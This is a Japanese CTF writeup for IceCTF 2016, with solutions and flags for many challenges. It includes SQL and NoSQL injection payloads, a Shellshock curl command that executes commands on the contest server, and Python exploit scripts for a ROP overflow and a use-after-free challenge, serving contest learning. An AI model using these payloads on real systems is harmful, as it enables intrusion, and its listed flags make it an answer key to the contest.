IceCTF 2016 writeup

WackMCで参加して, 2231pts, 95/1696 位でした. 今回は1チームあたりの人数制限があったので, CTF wo Suru内で分かれました.

WackMCというのは, まあ4月あたりからイベント型のCTF出るようにしてて, まあこれがそのチームなんですが ほとんど個人で出ていてたまにみどりンゴwが加わるくらいの感じのチームで個人で出るときはこのチーム名で出ています.

今回は, 3人で出ました.

メンバーのwriteup

Stage1

Hello World! - 1

問題文にFLAG

IceCTF{h3l10_wr0ld}

Spotlight - 10

http://spotlight.vuln.icec.tf/spotlight.jsにFLAG

IceCTF{5tup1d_d3v5_w1th_th31r_l095}

All your Base are belong to us - 15

f = open('flag_63c24d48595eae318c9a174f37ffb0f128758e5c16fea0ffebf12b0ba5f5b26a.txt', 'r')
print ''.join(chr(int(data, 2)) for data in f.read().split())

IceCTF{al1_my_bases_are_yours_and_all_y0ur_bases_are_mine}

Rotated! - 20

VprPGS{jnvg_bar_cyhf_1_vf_3?} たぶんrot13

IceCTF{wait_one_plus_1_is_3?}

Move Along - 30

問題文のURLにアクセスすると画像があって画像のURLみると

http://move-along.vuln.icec.tf/move_along/nothing-to-see-here.jpg なので, http://move-along.vuln.icec.tf/move_along/ にアクセスするとflagっぽいjpg置かれてる.

http://move-along.vuln.icec.tf/move_along/0f76da769d67e021518f05b552406ff6/secret.jpg

IceCTF{tH3_c4t_15_Ou7_oF_THe_b49}

Substituted - 30

http://quipqiup.com/に投げてオワリ!w

IceCTF{always_listen_to_your_substitute_flags}

IRC I - 35

solved by yue_roo

http://yuelab82.hatenablog.com/entry/icectf2016_writeup

Alien Message - 40

solved by yue_roo

Time Traveler - 45

http://web.archive.org/web/20160601212948/http://time-traveler.icec.tf/

Scavenger Hunt - 50

solved by yue_roo

スポンサーのページに書いてあったらしい

Stage2

Complacent - 40

solved by lenia

SSL証明書の詳細を表示したらいけたそう

Search - 40

http://mxtoolbox.com/SuperTool.aspxに投げた

Hidden in Plain Sight - 45

objdump -M intel -S ./hidden_in_plain_sight| grep mov | grep al | grep 0x
 804851b:	b0 49                	mov    al,0x49
 804851d:	b0 63                	mov    al,0x63
 804851f:	b0 65                	mov    al,0x65
 8048521:	b0 43                	mov    al,0x43
 8048523:	b0 54                	mov    al,0x54
 8048525:	b0 46                	mov    al,0x46
 8048527:	b0 7b                	mov    al,0x7b
 8048529:	b0 6c                	mov    al,0x6c
 804852b:	b0 6f                	mov    al,0x6f
 804852d:	b0 6f                	mov    al,0x6f
 804852f:	b0 6b                	mov    al,0x6b
 8048531:	b0 5f                	mov    al,0x5f
 8048533:	b0 6d                	mov    al,0x6d
 8048535:	b0 6f                	mov    al,0x6f
 8048537:	b0 6d                	mov    al,0x6d
 8048539:	b0 5f                	mov    al,0x5f
 804853b:	b0 49                	mov    al,0x49
 804853d:	b0 5f                	mov    al,0x5f
 804853f:	b0 66                	mov    al,0x66
 8048541:	b0 6f                	mov    al,0x6f
 8048543:	b0 75                	mov    al,0x75
 8048545:	b0 6e                	mov    al,0x6e
 8048547:	b0 64                	mov    al,0x64
 8048549:	b0 5f                	mov    al,0x5f
 804854b:	b0 69                	mov    al,0x69
 804854d:	b0 74                	mov    al,0x74
 804854f:	b0 7d                	mov    al,0x7d

Toke - 45

solved by lenia

適当にログインしてCookieのjwt_tokenをbase64でデコードしたら出てきちゃいました

Flag Storage - 50

’ OR 1#

IceCTF{why_would_you_even_do_anything_client_side}

RSA? - 50

これはRSAではなく, ただの16進数の

'4963654354467b66616c6c735f61706172745f736f5f656173696c795f616e645f7265617373656d626c65645f736f5f63727564656c797d'.decode('hex')

IceCTF{falls_apart_so_easily_and_reassembled_so_crudely}

Demo - 55

与えられる

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>

void give_shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

int main(int argc, char *argv[]) {
    if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
        give_shell();
    }
    else {
        printf("I'm sorry, your free trial has ended.\n");
    }
    return 0;
}

ln -s /home/demo/demo /tmp/adsfakjadsfas/icesh; cd /tmp/adsfakjadsfas; ./icesh です

IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

Thor’s a hacker now - 55

確かvimをバイナリモードで編集して%!xxd -rの後保存して解凍した気がする

Dear diary - 60

忘れた.たぶんBOFがあって, flagの関数もあったので

python -c ‘print “[flagのアドレス]” * 0x100’ ./binary

みたいな事をした.

Exposed! - 60

solved by yue_roo

gitの問題

IRC II - 60

solved by yue_roo

RSA - 60

ソルバ消えた

Smashing Profit! - 60

忘れた

Miners! - 65

うろ覚えですが…

username: 1' union select 1,1,1# password: 1

これはABCTFで分かんねぇ〜wって叫びながら解いたやつとほとんど一緒だったので一瞬で解けた.

Over the Hill - 65

solved by yue_roo

Kitty - 70

solved by lenia

Audio Problems - 50

solved by yue_roo

FFTにかけた

Corrupt Transmission - 50

忘れた(すいません) 次から解いたらwriteup書いていきたい

Vape Nation - 50

solved by yue_roo

stegsolveに投げる

Blue Monday - 60

solved by yue_roo

>>> f = open('blue_monday_ff0973317ee7c2df4225f994ad49bb4075546b9f20eb22bbc636be910f628bfd', 'rb')
>>> data = f.read()
>>> data
'MThd\x00\x00\x00\x06\x00\x01\x00\x01\x00\xdcMTrk\x00\x00\x01\xbe\x00\x90Id\x81\\\x80I\x00\x00\x90cd\x81\\\x80c\x00\x00\x90ed\x81\\\x80e\x00\x00\x90Cd\x81\\\x80C\x00\x00\x90Td\x81\\\x80T\x00\x00\x90Fd\x81\\\x80F\x00\x00\x90{d\x81\\\x80{\x00\x00\x90Hd\x81\\\x80H\x00\x00\x90Ad\x81\\\x80A\x00\x00\x90cd\x81\\\x80c\x00\x00\x90kd\x81\\\x80k\x00\x00\x901d\x81\\\x801\x00\x00\x90nd\x81\\\x80n\x00\x00\x909d\x81\\\x809\x00\x00\x90_d\x81\\\x80_\x00\x00\x90md\x81\\\x80m\x00\x00\x90Ud\x81\\\x80U\x00\x00\x905d\x81\\\x805\x00\x00\x90Id\x81\\\x80I\x00\x00\x90cd\x81\\\x80c\x00\x00\x90_d\x81\\\x80_\x00\x00\x90Wd\x81\\\x80W\x00\x00\x901d\x81\\\x801\x00\x00\x907d\x81\\\x807\x00\x00\x90hd\x81\\\x80h\x00\x00\x90_d\x81\\\x80_\x00\x00\x90md\x81\\\x80m\x00\x00\x90Id\x81\\\x80I\x00\x00\x90Dd\x81\\\x80D\x00\x00\x901d\x81\\\x801\x00\x00\x905d\x81\\\x805\x00\x00\x90_d\x81\\\x80_\x00\x00\x90Ld\x81\\\x80L\x00\x00\x903d\x81\\\x803\x00\x00\x90td\x81\\\x80t\x00\x00\x905d\x81\\\x805\x00\x00\x90_d\x81\\\x80_\x00\x00\x90Hd\x81\\\x80H\x00\x00\x904d\x81\\\x804\x00\x00\x90vd\x81\\\x80v\x00\x00\x90Ed\x81\\\x80E\x00\x00\x90_d\x81\\\x80_\x00\x00\x90ad\x81\\\x80a\x00\x00\x90_d\x81\\\x80_\x00\x00\x90rd\x81\\\x80r\x00\x00\x904d\x81\\\x804\x00\x00\x90vd\x81\\\x80v\x00\x00\x903d\x81\\\x803\x00\x00\x90}d\x81\\\x80}\x00\x87h\xff/\x00'
>>> flag = ''
>>> for i in data.split('\\\x80'):
...  flag += i[0]
... 
>>> flag
'MIceCTF{HAck1n9_mU5Ic_W17h_mID15_L3t5_H4vE_a_r4v3}'

R.I.P Transmission - 65

$ foremost -T rip
output〜みたいなディレクトリ出来てて中にzipある
$ fcrackzip -u -l 1-7 -c 'a' 00002585.zip


PASSWORD FOUND!!!!: pw == bunny

$ unzip 00002585.zip
$ xli rip.jpg

ChainedIn - 75

はじめてのNoSQL Injection

curl -H "Content-Type: application/json" -d '{"user": {"$ne": "a"},"pass": {"$regex": "IceCTT"}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Invalid Credentials"}
curl -H "Content-Type: application/json" -d '{"user": {"$ne": "a"},"pass": {"$regex": "IceCTF"}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Welcome back Administrator!"}

みたいな感じ

IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo}

Drumpf Hotels - 75

from No___Op import *

target = "drumpf.vuln.icec.tf:6502"

c = Pwning( target )

c.sendall('1')
c.sendall("B" * 269)
c.sendall('1')
c.sendall('AAAA')
c.sendall('3')
c.sendall('1')
c.sendall('CCCC')
c.sendall('4')
c.sendall('3')
c.sendall('2')
c.sendall('DDDDDDDD')
c.sendall('134514237')
c.sendall('4')
c.sendall('5')

print c.recv()
print c.recv()
print c.recv()
print c.recv()
print c.recv()
print c.recv()
# python exploit.py | grep Ice

Use After Free問っぽい

IceCTF{they_can_take_our_overflows_but_they_will_never_take_our_use_after_freeeedom!}

ROPi - 75

from No___Op import *

if len(sys.argv) < 2:
    target = "localhost:6500"


else:
    target = "drumpf.vuln.icec.tf:6500"

c = Pwning( target )

addr_pro = 0x0804862c
addr_ori = 0x080485c4
addr_ret = 0x08048569
addr_ezy = 0x0804852d

print c.recv()

payload  = "A" * 44
payload += p32(addr_ret)
payload += p32(addr_ezy)
payload += p32(0xbadbeeef)

c.sendall(payload)
print c.recv()

payload  = "A" * 44
payload += p32(addr_ori)
payload += p32(addr_ezy)
payload += p32(0xabcdefff)
payload += p32(0x78563412)

c.sendall(payload)
print c.recv()

payload  = "A" * 44
payload += p32(addr_pro)
payload += p32(addr_ezy)

c.sendall(payload)
print c.recv()
print c.recv()

ROP問っぽい

IceCTF{italiano_ha_portato_a_voi_da_google_tradurre}

A Strong Feeling - 80

$ cat asm | grep cmp                          
  4004fc:	48 83 f8 0e          	cmp    rax,0xe
  400570:	80 3d 79 28 20 00 00 	cmp    BYTE PTR [rip+0x202879],0x0        # 602df0 <stdin+0x8>
  400595:	48 83 3f 00          	cmp    QWORD PTR [rdi],0x0
  4010fa:	81 fa 49 00 00 00    	cmp    edx,0x49
  401178:	81 fa 63 00 00 00    	cmp    edx,0x63
  4011ff:	81 fa 65 00 00 00    	cmp    edx,0x65
  401284:	81 fa 43 00 00 00    	cmp    edx,0x43
  401309:	81 fa 54 00 00 00    	cmp    edx,0x54
  401387:	81 fa 46 00 00 00    	cmp    edx,0x46
  40140c:	81 fa 7b 00 00 00    	cmp    edx,0x7b
  401491:	81 fa 70 00 00 00    	cmp    edx,0x70
  40150f:	81 fa 69 00 00 00    	cmp    edx,0x69
  40158d:	81 fa 70 00 00 00    	cmp    edx,0x70
  401612:	81 fa 5f 00 00 00    	cmp    edx,0x5f
  401697:	81 fa 69 00 00 00    	cmp    edx,0x69
  40171c:	81 fa 6e 00 00 00    	cmp    edx,0x6e
  4017a1:	81 fa 73 00 00 00    	cmp    edx,0x73
  401826:	81 fa 74 00 00 00    	cmp    edx,0x74
  4018ab:	81 fa 61 00 00 00    	cmp    edx,0x61
  401932:	81 fa 6c 00 00 00    	cmp    edx,0x6c
  4019b7:	81 fa 6c 00 00 00    	cmp    edx,0x6c
  401a3c:	81 fa 5f 00 00 00    	cmp    edx,0x5f
  401aba:	81 fa 61 00 00 00    	cmp    edx,0x61
  401b41:	81 fa 6e 00 00 00    	cmp    edx,0x6e
  401bc6:	81 fa 67 00 00 00    	cmp    edx,0x67
  401c44:	81 fa 72 00 00 00    	cmp    edx,0x72
  401cc9:	81 fa 7d 00 00 00    	cmp    edx,0x7d
  401dc1:	48 39 eb             	cmp    rbx,rbp

angr使う問題っぽかったんだけど, 使えないよ〜ふぇえ〜><;

IceCTF{pip_install_angr}

Matrix - 85

solved by yue_roo

RSA2 - 90

def egcd(a, b):
 if (a == 0):
     return [b, 0, 1]
 else:
     g, y, x = egcd(b % a, a)
     return [g, x - (b // a) * y, y]

def modInv(a, m):
 g, x, y = egcd(a, m)
 if (g != 1):
     raise Exception("[-]No modular multiplicative inverse of %d under modulus %d" % (a, m))
 else:
     return x % m

def decrypt(p, q, e, c):
	n = p * q
	phi = (p - 1) * (q - 1)
	d = modInv(e, phi)
	m = pow(c, d, n)
	return m


n = 0x180be86dc898a3c3a710e52b31de460f8f350610bf63e6b2203c08fddad44601d96eb454a34dab7684589bc32b19eb27cffff8c07179e349ddb62898ae896f8c681796052ae1598bd41f35491175c9b60ae2260d0d4ebac05b4b6f2677a7609c2fe6194fe7b63841cec632e3a2f55d0cb09df08eacea34394ad473577dea5131552b0b30efac31c59087bfe603d2b13bed7d14967bfd489157aa01b14b4e1bd08d9b92ec0c319aeb8fedd535c56770aac95247d116d59cae2f99c3b51f43093fd39c10f93830c1ece75ee37e5fcdc5b174052eccadcadeda2f1b3a4a87184041d5c1a6a0b2eeaa3c3a1227bc27e130e67ac397b375ffe7c873e9b1c649812edcd

e = 1

c=0x4963654354467b66616c6c735f61706172745f736f5f656173696c795f616e645f7265617373656d626c65645f736f5f63727564656c797d

p = 57970027

q = n / p

m = decrypt(p, q, e, c)
print hex(m)[2:-1].decode("hex")

IceCTF{falls_apart_so_easily_and_reassembled_so_crudely}

Geocities - 100

shellshock!w

$ curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/ls -lia " http://geocities.vuln.icec.tf/
total 280
  181 drwxr-xr-x  5 ctf      ctf        4096 Aug 26 07:11 .
    2 drwxr-xr-x 67 root     root       4096 Aug 25 14:54 ..
  266 -r--r--r--  1 www-data www-data   4485 Aug 13 21:53 blog.html
16092 -rw-------  1 ctf      ctf      389120 Aug 26 07:11 core
  201 -r-xr-xr-x  1 www-data www-data    423 Aug 13 21:53 get_posts.pl
16089 -r-xr-xr-x  1 ctf      ctf         426 Aug 26 02:02 get_posts2.pl
  267 dr-xr-xr-x  2 www-data www-data   4096 Aug 13 21:57 img
  194 -rwx------  1 ctf      ctf        2981 Aug 13 21:53 index.cgi
16098 -rw-r--r--  1 ctf      ctf          49 Aug 26 04:00 ratf

$ curl -A "() { :;}; echo Content-type:text/plain;echo; /usr/bin/perl get_posts2.pl  " http://geocities.vuln.icec.tf/
1;IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7};

Intercepted Conversations Pt.2 - 105

yue_rooさんがpycあるよて事で抽出してくれてた.

https://github.com/rocky/python-uncompyle6使ってデコンパイル出来た

以下ソルバ(綺麗に直してないのは許して.)


import random
import base64
P = [27,
        35,
        50,
        11,
        8,
        20,
        44,
        30,
        6,
        1,
        5,
        2,
        33,
        16,
        36,
        64,
        3,
        61,
        54,
        25,
        12,
        21,
        26,
        10,
        57,
        53,
        38,
        56,
        58,
        37,
        43,
        17,
        42,
        47,
        4,
        14,
        7,
        46,
        34,
        19,
        23,
        40,
        63,
        18,
        45,
        60,
        13,
        15,
        22,
        9,
        62,
51,
 32,
 55,
 29,
 24,
 41,
 39,
 49,
 52,
 48,
 28,
 31,
 59]
S = [68,
        172,
        225,
        210,
        148,
        172,
        72,
        38,
        208,
        227,
        0,
        240,
        193,
        67,
        122,
        108,
        252,
        57,
        174,
        197,
        83,
        236,
        16,
        226,
        133,
        94,
        104,
        228,
        135,
        251,
        150,
        52,
        85,
        56,
        174,
        105,
        215,
        251,
        111,
        77,
        44,
        116,
        128,
        196,
        43,
        210,
        214,
        203,
        109,
        65,
        157,
222,
 93,
 74,
 209,
 50,
 11,
 172,
 247,
 111,
 80,
 143,
 70,
 89]

inp = 'Wmkvw680HDzDqMK6UBXChDXCtC7CosKmw7R9w7JLwr/CoT44UcKNwp7DllpPwo3DtsOID8OPTcOWwrzDpi3CtMOKw4PColrCpXUYRhXChMK9w6PDhxfDicOdwoAgwpgNw5/Cvw=='
inp = base64.b64decode(inp).decode('utf8')

ans = ['' for i in range(len(inp))]
"""
for j in range(0, len(inp), 64):
    for i in range(64):
        ans[j + P[i] - 1] = chr((ord(inp[j + i]) + S[i]) % 256)
"""

for j in range(0, len(inp), 64):
    for i in range(64):
        ans[j+i] = chr((ord(inp[j + P[i] - 1]) - S[i]) % 256)

print(''.join(ans))

Intercepted Conversations Pt.1 - 115

solved by lenia and yue_roo

((usb.transfer_type == 0x01) && (frame.len == 72)) && !(usb.capdata == 00:00:00:00:00:00:00:00)

これでwiresharkでパケット絞り込んでleftover capture dataみる

これで文字列抽出出来たけど, flagっぽい文字列にならなくて詰んでる所にyue_rooさんがDvorakじゃない?w

と言ってくれてflagでした

IceCTF{Wh0_l1K3S_qw3R7Y_4NYw4y5}


オワリです.

ウサギさんチームには700pts差くらいで負けました.

pwn全然解けなかったのでオワリです.

まあワイワイやりながら解けたので楽しかったです.

Written on August 28, 2016